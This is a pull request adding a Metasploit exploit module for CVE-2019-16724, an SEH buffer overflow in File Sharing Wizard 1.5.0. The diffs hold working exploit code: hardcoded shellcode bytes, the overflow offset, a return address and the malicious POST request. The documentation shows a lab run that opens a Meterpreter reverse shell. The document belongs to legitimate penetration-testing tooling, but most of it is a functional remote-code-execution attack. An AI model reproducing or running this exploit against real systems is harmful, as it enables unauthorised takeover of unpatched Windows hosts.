### PR TITLE
File sharing wizard seh module CVE 2019-16724

### DIFF
--- a/documentation/modules/exploit/windows/http/file_sharing_wizard_seh.md
+++ b/documentation/modules/exploit/windows/http/file_sharing_wizard_seh.md
@@ -1,0 +1,49 @@
+## Description
+
+This module exploits a vulnerability in File Sharing Wizard version 1.5.0 which
+allows a remote attacker to obtain arbitrary code execution by exploiting a Structured Exception Handler (SEH) based buffer overflow in an HTTP POST parameter.
+
+## Vulnerable Application
+
+This module has been tested successfully on:
+
+ * Windows 7 x86 SP1
+
+The application installer is linked below
+
+[File Sharing Wizard Installer](https://www.exploit-db.com/apps/da3a3626f99a85f9ab59ab77f083ff80-fs-wizard-setup.exe)
+
+Once installed run the application and click "Start" to enable the server.
+
+## Verification Steps
+
+ 1. Start `msfconsole`
+ 2. Do: `use exploits/windows/http/file_sharing_wizard_seh`
+ 3. Do: `set rhosts [IP]`
+ 4. Do: `run`
+ 5. Your payload should get executed
+
+## Scenarios
+
+```
+msf5 > use exploit/windows/http/file_sharing_wizard_seh
+msf5 exploit(windows/http/file_sharing_wizard_seh) > set RHOSTS 192.168.56.101
+RHOSTS => 192.168.56.101
+msf5 exploit(windows/http/file_sharing_wizard_seh) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[*] 192.168.56.101:80 - Connecting to target
+[*] 192.168.56.101:80 - Sending payload to target
+[*] Sending stage (180291 bytes) to 192.168.56.101
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:49164) at 2019-10-03 23:09:18 +0100
+
+meterpreter > sysinfo
+Computer        : TARGET
+OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
+Architecture    : x86
+System Language : en_GB
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x86/windows
+meterpreter >
+```

--- a/modules/exploits/multi/http/file_sharing_wizard_rce.rb
+++ b/modules/exploits/multi/http/file_sharing_wizard_rce.rb
@@ -5,11 +5,12 @@
 
 class MetasploitModule < Msf::Exploit::Remote
 
+  Rank = NormalRanking
+
   include Msf::Exploit::Remote::Tcp
   include Msf::Exploit::Seh
 
   def initialize(info = {})
-    Rank = NormalRanking
     super update_info(info,
                       'Name' => 'File Sharing Wizard 1.5.0 - POST SEH Overflow',
                       'Description' => %q(

--- a/modules/exploits/multi/http/file_sharing_wizard_rce.rb
+++ b/modules/exploits/multi/http/file_sharing_wizard_rce.rb
@@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Seh
 
   def initialize(info = {})
+    Rank = NormalRanking
     super update_info(info,
                       'Name' => 'File Sharing Wizard 1.5.0 - POST SEH Overflow',
                       'Description' => %q(

--- a/modules/exploits/multi/http/file_sharing_wizard_rce.rb
+++ b/modules/exploits/multi/http/file_sharing_wizard_rce.rb
@@ -17,81 +17,38 @@ class MetasploitModule < Msf::Exploit::Remote
         This module exploits a SEH based buffer overflow in an HTTP POST parameter in File Sharing Wizard 1.5.0
       ),
                       'Author' => [
-                          'x00pwn', # Original exploit
-                          'Dean Welch <dean_welch[at]rapid7.com>' # Module
+                        'x00pwn', # Original exploit
+                        'Dean Welch <dean_welch[at]rapid7.com>' # Module
                       ],
                       'License'        => MSF_LICENSE,
                       'References'     =>
                           [
-                              ['CVE', '2019-16724'],
-                              ['EDB', '47412']
+                              %w(CVE 2019-16724),
+                              %w(EDB 47412)
                           ],
                       'Payload' =>
                           {
-                              'BadChars' => "\x00",
-                              'DisableNops' => true
-                              # 'NopSledSize' => 100,
-                              # 'Space' => 1040
+                            'BadChars' => "\x00",
+                            'NopSledSize' => 100,
+                            'Space' => 1000
                           },
                       'DisclosureDate' => 'Sep 24 2019',
-                      'DefaultOptions'  =>
+                      'DefaultOptions' =>
                           {
-                              'EXITFUNC' => 'seh',
-                              'RPORT' => "80",
-                              'RHOSTS' => "10.5.3.71",
-                              'CMD' => "calc.exe"
+                            'EXITFUNC' => 'seh',
+                            'RPORT' => "80"
                           },
                       'Platform'       => 'win',
                       'Targets'        =>
                           [
-                              ['v1.0 - XP / Win7',
-                               {
-                                   # 'Offset' => 1040,
-                                   # 'Ret'    => 0x7c38a67f
-                               }
-                              ]
-                          ],
-                      )
+                            ['Win7 x86', { 'Offset' => 1040, 'Ret' => 0x7c38a67f }]
+                          ])
   end
 
-  # def check()
-  #   res = send_request_cgi({ 'uri' => '10.5.3.71:80'})
-  #   print_status(res.message)
-  # end
-  #
+  def exploit
 
-  def exploit()
-
-    shellcode =  ""
-    shellcode += "\xd9\xc7\xd9\x74\x24\xf4\xba\x65\x1d\x84\xe1\x5f"
-    shellcode += "\x29\xc9\xb1\x31\x31\x57\x18\x03\x57\x18\x83\xef"
-    shellcode += "\x99\xff\x71\x1d\x89\x82\x7a\xde\x49\xe3\xf3\x3b"
-    shellcode += "\x78\x23\x67\x4f\x2a\x93\xe3\x1d\xc6\x58\xa1\xb5"
-    shellcode += "\x5d\x2c\x6e\xb9\xd6\x9b\x48\xf4\xe7\xb0\xa9\x97"
-    shellcode += "\x6b\xcb\xfd\x77\x52\x04\xf0\x76\x93\x79\xf9\x2b"
-    shellcode += "\x4c\xf5\xac\xdb\xf9\x43\x6d\x57\xb1\x42\xf5\x84"
-    shellcode += "\x01\x64\xd4\x1a\x1a\x3f\xf6\x9d\xcf\x4b\xbf\x85"
-    shellcode += "\x0c\x71\x09\x3d\xe6\x0d\x88\x97\x37\xed\x27\xd6"
-    shellcode += "\xf8\x1c\x39\x1e\x3e\xff\x4c\x56\x3d\x82\x56\xad"
-    shellcode += "\x3c\x58\xd2\x36\xe6\x2b\x44\x93\x17\xff\x13\x50"
-    shellcode += "\x1b\xb4\x50\x3e\x3f\x4b\xb4\x34\x3b\xc0\x3b\x9b"
-    shellcode += "\xca\x92\x1f\x3f\x97\x41\x01\x66\x7d\x27\x3e\x78"
-    shellcode += "\xde\x98\x9a\xf2\xf2\xcd\x96\x58\x98\x10\x24\xe7"
-    shellcode += "\xee\x13\x36\xe8\x5e\x7c\x07\x63\x31\xfb\x98\xa6"
-    shellcode += "\x76\xfd\x69\x7b\x62\x6a\xd0\xee\xcf\xf6\xe3\xc4"
-    shellcode += "\x13\x0f\x60\xed\xeb\xf4\x78\x84\xee\xb1\x3e\x74"
-    shellcode += "\x82\xaa\xaa\x7a\x31\xca\xfe\x18\xd4\x58\x62\xf1"
-    shellcode += "\x73\xd9\x01\x0d"
-
-
-
-    buf = "A"*1040
-    # buf << generate_seh_payload(pack(0x7c38a67f))
-    buf += [0x909032EB].pack('I')
-    buf += [0x7c38a67f].pack("I")
-    buf += "\x90" * 100
-    buf += shellcode
-    buf += "D"*(5000-buf.length)
+    buf = rand_text_english(target['Offset'], payload_badchars)
+    buf << generate_seh_payload(target.ret)
 
     print_status("PAYLOAD: " + buf)
     payload_header = "POST " + buf

--- a/modules/exploits/multi/http/file_sharing_wizard_rce.rb
+++ b/modules/exploits/multi/http/file_sharing_wizard_rce.rb
@@ -1,0 +1,102 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Seh
+
+  def initialize(info = {})
+    super update_info(info,
+                      'Name' => 'File Sharing Wizard 1.5.0 - POST SEH Overflow',
+                      'Description' => %q(
+        This module exploits a SEH based buffer overflow in an HTTP POST parameter in File Sharing Wizard 1.5.0
+      ),
+                      'Author' => [
+                          'x00pwn', # Original exploit
+                          'Dean Welch <dean_welch[at]rapid7.com>' # Module
+                      ],
+                      'License'        => MSF_LICENSE,
+                      'References'     =>
+                          [
+                              ['CVE', '2019-16724'],
+                              ['EDB', '47412']
+                          ],
+                      'Payload' =>
+                          {
+                              'BadChars' => "\x00",
+                              'DisableNops' => true
+                              # 'NopSledSize' => 100,
+                              # 'Space' => 1040
+                          },
+                      'DisclosureDate' => 'Sep 24 2019',
+                      'DefaultOptions'  =>
+                          {
+                              'EXITFUNC' => 'seh',
+                              'RPORT' => "80",
+                              'RHOSTS' => "10.5.3.71",
+                              'CMD' => "calc.exe"
+                          },
+                      'Platform'       => 'win',
+                      'Targets'        =>
+                          [
+                              ['v1.0 - XP / Win7',
+                               {
+                                   # 'Offset' => 1040,
+                                   # 'Ret'    => 0x7c38a67f
+                               }
+                              ]
+                          ],
+                      )
+  end
+
+  # def check()
+  #   res = send_request_cgi({ 'uri' => '10.5.3.71:80'})
+  #   print_status(res.message)
+  # end
+  #
+
+  def exploit()
+
+    shellcode =  ""
+    shellcode += "\xd9\xc7\xd9\x74\x24\xf4\xba\x65\x1d\x84\xe1\x5f"
+    shellcode += "\x29\xc9\xb1\x31\x31\x57\x18\x03\x57\x18\x83\xef"
+    shellcode += "\x99\xff\x71\x1d\x89\x82\x7a\xde\x49\xe3\xf3\x3b"
+    shellcode += "\x78\x23\x67\x4f\x2a\x93\xe3\x1d\xc6\x58\xa1\xb5"
+    shellcode += "\x5d\x2c\x6e\xb9\xd6\x9b\x48\xf4\xe7\xb0\xa9\x97"
+    shellcode += "\x6b\xcb\xfd\x77\x52\x04\xf0\x76\x93\x79\xf9\x2b"
+    shellcode += "\x4c\xf5\xac\xdb\xf9\x43\x6d\x57\xb1\x42\xf5\x84"
+    shellcode += "\x01\x64\xd4\x1a\x1a\x3f\xf6\x9d\xcf\x4b\xbf\x85"
+    shellcode += "\x0c\x71\x09\x3d\xe6\x0d\x88\x97\x37\xed\x27\xd6"
+    shellcode += "\xf8\x1c\x39\x1e\x3e\xff\x4c\x56\x3d\x82\x56\xad"
+    shellcode += "\x3c\x58\xd2\x36\xe6\x2b\x44\x93\x17\xff\x13\x50"
+    shellcode += "\x1b\xb4\x50\x3e\x3f\x4b\xb4\x34\x3b\xc0\x3b\x9b"
+    shellcode += "\xca\x92\x1f\x3f\x97\x41\x01\x66\x7d\x27\x3e\x78"
+    shellcode += "\xde\x98\x9a\xf2\xf2\xcd\x96\x58\x98\x10\x24\xe7"
+    shellcode += "\xee\x13\x36\xe8\x5e\x7c\x07\x63\x31\xfb\x98\xa6"
+    shellcode += "\x76\xfd\x69\x7b\x62\x6a\xd0\xee\xcf\xf6\xe3\xc4"
+    shellcode += "\x13\x0f\x60\xed\xeb\xf4\x78\x84\xee\xb1\x3e\x74"
+    shellcode += "\x82\xaa\xaa\x7a\x31\xca\xfe\x18\xd4\x58\x62\xf1"
+    shellcode += "\x73\xd9\x01\x0d"
+
+
+
+    buf = "A"*1040
+    # buf << generate_seh_payload(pack(0x7c38a67f))
+    buf += [0x909032EB].pack('I')
+    buf += [0x7c38a67f].pack("I")
+    buf += "\x90" * 100
+    buf += shellcode
+    buf += "D"*(5000-buf.length)
+
+    print_status("PAYLOAD: " + buf)
+    payload_header = "POST " + buf
+    payload_header += " HTTP/1.0\r\n\r\n"
+    connect
+    sock.put(payload_header)
+
+  end
+
+end

--- a/modules/exploits/windows/http/file_sharing_wizard_seh.rb
+++ b/modules/exploits/windows/http/file_sharing_wizard_seh.rb
@@ -33,7 +33,6 @@ class MetasploitModule < Msf::Exploit::Remote
                       'DisclosureDate' => 'Sep 24 2019',
                       'DefaultOptions' =>
                           {
-                            'EXITFUNC' => 'seh',
                             'RPORT' => "80",
                             'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
                           },

--- a/modules/exploits/windows/http/file_sharing_wizard_seh.rb
+++ b/modules/exploits/windows/http/file_sharing_wizard_seh.rb
@@ -28,9 +28,7 @@ class MetasploitModule < Msf::Exploit::Remote
                           ],
                       'Payload' =>
                           {
-                            'BadChars' => "\x00",
-                            'NopSledSize' => 100,
-                            'Space' => 1040
+                            'BadChars' => "\x00\x20"
                           },
                       'DisclosureDate' => 'Sep 24 2019',
                       'DefaultOptions' =>
@@ -47,7 +45,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-
     buf = rand_text_english(target['Offset'], payload_badchars)
     buf << generate_seh_payload(target.ret)
     payload_header = "POST " + buf
@@ -56,7 +53,6 @@ class MetasploitModule < Msf::Exploit::Remote
     connect
     print_status("Sending payload to target")
     sock.put(payload_header)
-
   end
 
 end

--- a/modules/exploits/windows/http/file_sharing_wizard_seh.rb
+++ b/modules/exploits/windows/http/file_sharing_wizard_seh.rb
@@ -30,13 +30,14 @@ class MetasploitModule < Msf::Exploit::Remote
                           {
                             'BadChars' => "\x00",
                             'NopSledSize' => 100,
-                            'Space' => 1000
+                            'Space' => 1040
                           },
                       'DisclosureDate' => 'Sep 24 2019',
                       'DefaultOptions' =>
                           {
                             'EXITFUNC' => 'seh',
-                            'RPORT' => "80"
+                            'RPORT' => "80",
+                            'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
                           },
                       'Platform'       => 'win',
                       'Targets'        =>
@@ -49,11 +50,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
     buf = rand_text_english(target['Offset'], payload_badchars)
     buf << generate_seh_payload(target.ret)
-
-    print_status("PAYLOAD: " + buf)
     payload_header = "POST " + buf
     payload_header += " HTTP/1.0\r\n\r\n"
+    print_status("Connecting to target")
     connect
+    print_status("Sending payload to target")
     sock.put(payload_header)
 
   end

--- a/modules/exploits/windows/http/file_sharing_wizard_seh.rb
+++ b/modules/exploits/windows/http/file_sharing_wizard_seh.rb
@@ -60,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     buf = rand_text_english(target['Offset'])
     buf << generate_seh_payload(target.ret)
-    print_status("Sending payload to target")
+    print_status('Sending payload to target')
     send_request_raw({ 'method' => 'POST', 'uri' => buf }, 0)
   end
 

--- a/modules/exploits/windows/http/file_sharing_wizard_seh.rb
+++ b/modules/exploits/windows/http/file_sharing_wizard_seh.rb
@@ -7,7 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   Rank = NormalRanking
 
-  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Seh
 
   def initialize(info = {})
@@ -37,21 +37,33 @@ class MetasploitModule < Msf::Exploit::Remote
                             'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
                           },
                       'Platform'       => 'win',
-                      'Targets'        =>
+                      'Arch' => [ ARCH_X86 ],
+                      'Targets' =>
                           [
-                            ['Win7 x86', { 'Offset' => 1040, 'Ret' => 0x7c38a67f }]
+                            ['Win7 x86', { 'Offset' => 1040, 'Ret' => 0x7c38a67f }] # 0x7c38a67f : pop ecx # pop ecx # ret  |  {PAGE_EXECUTE_READ} [MSVCR71.dll]
                           ])
+  end
+
+  def check
+    res = send_request_cgi
+    if res.nil?
+      fail_with(Failure::Unreachable, 'Connection timed out.')
+    end
+    # Checks for the `WWW-Authenticate` header in the response
+    if res.code && res.code == 401 && res.headers['WWW-Authenticate'] =~ /Basic realm="File Sharing Wizard"/
+      CheckCode::Detected
+    else
+      CheckCode::Safe
+    end
   end
 
   def exploit
     buf = rand_text_english(target['Offset'])
     buf << generate_seh_payload(target.ret)
     payload_header = "POST " + buf
-    payload_header << " HTTP/1.0\r\n\r\n"
     print_status("Connecting to target")
-    connect
     print_status("Sending payload to target")
-    sock.put(payload_header)
+    send_request_raw({ 'method' => payload_header }, 0)
   end
 
 end

--- a/modules/exploits/windows/http/file_sharing_wizard_seh.rb
+++ b/modules/exploits/windows/http/file_sharing_wizard_seh.rb
@@ -23,18 +23,18 @@ class MetasploitModule < Msf::Exploit::Remote
                       'License'        => MSF_LICENSE,
                       'References'     =>
                           [
-                              %w(CVE 2019-16724),
-                              %w(EDB 47412)
+                            %w(CVE 2019-16724),
+                            %w(EDB 47412)
                           ],
                       'Payload' =>
                           {
-                            'BadChars' => "\x00\x20"
+                            BadChars: "\x00\x20"
                           },
                       'DisclosureDate' => '2019-09-24',
                       'DefaultOptions' =>
                           {
-                            'RPORT' => "80",
-                            'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
+                            RPORT: "80",
+                            PAYLOAD: 'windows/meterpreter/reverse_tcp'
                           },
                       'Platform'       => 'win',
                       'Targets'        =>

--- a/modules/exploits/windows/http/file_sharing_wizard_seh.rb
+++ b/modules/exploits/windows/http/file_sharing_wizard_seh.rb
@@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
                       'Arch' => [ ARCH_X86 ],
                       'Targets' =>
                           [
-                            ['Win7 x86', { 'Offset' => 1040, 'Ret' => 0x7c38a67f }] # 0x7c38a67f : pop ecx # pop ecx # ret  |  {PAGE_EXECUTE_READ} [MSVCR71.dll]
+                            ['Windows Vista / Windows 7 (x86)', { 'Offset' => 1040, 'Ret' => 0x7c38a67f }] # 0x7c38a67f : pop ecx # pop ecx # ret  |  {PAGE_EXECUTE_READ} [MSVCR71.dll]
                           ])
   end
 

--- a/modules/exploits/windows/http/file_sharing_wizard_seh.rb
+++ b/modules/exploits/windows/http/file_sharing_wizard_seh.rb
@@ -50,7 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::Unreachable, 'Connection timed out.')
     end
     # Checks for the `WWW-Authenticate` header in the response
-    if res.code && res.code == 401 && res.headers['WWW-Authenticate'] =~ /Basic realm="File Sharing Wizard"/
+    if res.code && res.code == 401 && res.headers['WWW-Authenticate'].include?('Basic realm="File Sharing Wizard"')
       CheckCode::Detected
     else
       CheckCode::Safe
@@ -60,10 +60,8 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     buf = rand_text_english(target['Offset'])
     buf << generate_seh_payload(target.ret)
-    payload_header = "POST " + buf
-    print_status("Connecting to target")
     print_status("Sending payload to target")
-    send_request_raw({ 'method' => payload_header }, 0)
+    send_request_raw({ 'method' => 'POST', 'uri' => buf }, 0)
   end
 
 end

--- a/modules/exploits/windows/http/file_sharing_wizard_seh.rb
+++ b/modules/exploits/windows/http/file_sharing_wizard_seh.rb
@@ -30,7 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote
                           {
                             'BadChars' => "\x00\x20"
                           },
-                      'DisclosureDate' => 'Sep 24 2019',
+                      'DisclosureDate' => '2019-09-24',
                       'DefaultOptions' =>
                           {
                             'RPORT' => "80",

--- a/modules/exploits/windows/http/file_sharing_wizard_seh.rb
+++ b/modules/exploits/windows/http/file_sharing_wizard_seh.rb
@@ -12,9 +12,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
     super update_info(info,
-                      'Name' => 'File Sharing Wizard 1.5.0 - POST SEH Overflow',
+                      'Name' => 'File Sharing Wizard - POST SEH Overflow',
                       'Description' => %q(
-        This module exploits a SEH based buffer overflow in an HTTP POST parameter in File Sharing Wizard 1.5.0
+        This module exploits an unauthenticated HTTP POST SEH-based buffer overflow in File Sharing Wizard 1.5.0.
       ),
                       'Author' => [
                         'x00pwn', # Original exploit
@@ -23,18 +23,18 @@ class MetasploitModule < Msf::Exploit::Remote
                       'License'        => MSF_LICENSE,
                       'References'     =>
                           [
-                            %w(CVE 2019-16724),
-                            %w(EDB 47412)
+                            %w[CVE 2019-16724],
+                            %w[EDB 47412]
                           ],
                       'Payload' =>
                           {
-                            BadChars: "\x00\x20"
+                            'BadChars' => "\x00\x20"
                           },
                       'DisclosureDate' => '2019-09-24',
                       'DefaultOptions' =>
                           {
-                            RPORT: "80",
-                            PAYLOAD: 'windows/meterpreter/reverse_tcp'
+                            'RPORT' => 80,
+                            'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
                           },
                       'Platform'       => 'win',
                       'Targets'        =>
@@ -44,10 +44,10 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    buf = rand_text_english(target['Offset'], payload_badchars)
+    buf = rand_text_english(target['Offset'])
     buf << generate_seh_payload(target.ret)
     payload_header = "POST " + buf
-    payload_header += " HTTP/1.0\r\n\r\n"
+    payload_header << " HTTP/1.0\r\n\r\n"
     print_status("Connecting to target")
     connect
     print_status("Sending payload to target")


### PR DESCRIPTION
Adds a new module for exploiting CVE 2019-16724 in File Sharing wizard version 1.5.0

Tested against windows 7 32 bit SP1

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] Run the exploit:
```
use exploit/windows/http/file_sharing_wizard_seh
set RHOST 192.168.56.101
set LHOST 192.168.56.1
set PAYLOAD windows/x64/exec
set CMD calc.exe
run
```
- [x] **Verify** calc pops up
